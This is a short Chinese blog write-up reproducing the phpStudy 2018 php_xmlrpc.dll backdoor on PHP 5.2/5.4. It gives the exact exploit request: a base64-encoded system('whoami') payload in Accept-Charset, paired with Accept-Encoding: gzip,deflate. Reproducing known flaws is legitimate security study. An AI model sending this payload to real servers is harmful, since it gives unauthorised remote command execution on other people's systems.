phpstudyphp_xmlrpc.dll后门漏洞复现搭建环境:
phpstudy2018
php版本5.4
漏洞影响版本:5.2/5.4
漏洞利⽤
1、随便访问⼀个存在的php⽂件 我这⾥就访问index.php好了
用phpstudy搭建网站2、进⾏index.php 进⾏抓包 再⾃⾏添加两个字段payload 执⾏系统命令
Accept-Charset: ZWNobyBzeXN0ZW0oJ3dob2FtaScpOw==
Accept-Encoding: gzip,deflate
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。
发表评论